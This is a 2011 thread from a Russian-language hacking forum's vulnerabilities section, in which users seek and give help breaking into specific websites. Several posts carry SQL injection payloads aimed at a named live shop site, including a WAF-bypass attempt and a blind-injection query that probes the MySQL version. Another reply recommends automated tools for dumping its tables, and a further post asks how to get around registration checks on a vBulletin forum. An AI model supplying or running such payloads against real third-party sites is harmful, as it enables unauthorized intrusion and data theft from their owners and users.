HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.08.2011, 19:48
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

Цитата:
Сообщение от Konqi  
Покажи мне запросы по которым ты определил что там скуля
через BENCHMARK определил,но уже пишет форбиденн
 
Ответить с цитированием

  #2  
Старый 14.08.2011, 19:54
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Konqi  
Покажи мне запросы по которым ты определил что там скуля
int или intval в скрипте убери, тогда увидешь
 
Ответить с цитированием

  #3  
Старый 14.08.2011, 20:22
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

Цитата:
Сообщение от попугай  
int или intval в скрипте убери, тогда увидешь
в каком скрипте?
 
Ответить с цитированием

  #4  
Старый 14.08.2011, 20:34
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами: 9846041

Репутация: 1177


По умолчанию

Цитата:
Сообщение от Faaax  
в каком скрипте?
В этом параметре нету уязвимости. =\
 
Ответить с цитированием

  #5  
Старый 15.08.2011, 11:45
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами: 8462565

Репутация: 0
По умолчанию

ошибка на гл странице dle сайт

Код:
Deprecated: Function ereg() is deprecated in [PATH]/engine/modules/register.php on line 41
можно ли что то извлеч? или узнать версию?

стоит нулл

Цитата:
Сообщение от None  
DataLife Engine Nulled by M.I.D-Team (http://www.mid-team.ws)
примерно версии середины лета 2009 года (точно хз не работал с dle)
 
Ответить с цитированием

  #6  
Старый 15.08.2011, 11:49
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Нет.
 
Ответить с цитированием

  #7  
Старый 15.08.2011, 12:23
oODungVTOo
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами: 7864886

Репутация: 0
По умолчанию

WAF help please

http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
 
Ответить с цитированием

  #8  
Старый 15.08.2011, 12:55
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
С нами: 8395350

Репутация: 0
По умолчанию

есть форум на vbulletin. На почту не приходит уведомление для реги,тобишь группы нереал посмотреть. Есть ли альтернативный способ, допустим узнать имя любой группы, либо создать её?
 
Ответить с цитированием

  #9  
Старый 15.08.2011, 12:58
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от oODungVTOo  
WAF help please
http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
blind sql inj. Фильтруется union. Версия 4-я. Так что тут особо ловить нечего. Юзай проги типа хавиджа, они те и раскрутят скулю и попробуют подобрать по словарю имён таблиц и колонок.

пример скули:

Код:
http://www.pampling.com/ficha_producto.php?id_producto=26+and+1=(select+if(ascii(substr(version(),1))=52,1,0))--+
 
Ответить с цитированием

  #10  
Старый 15.08.2011, 14:09
oODungVTOo
Познающий
Регистрация: 03.06.2011
Сообщений: 85
С нами: 7864886

Репутация: 0
По умолчанию

SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5

SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4

I don't see difference at this page........can u help me?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.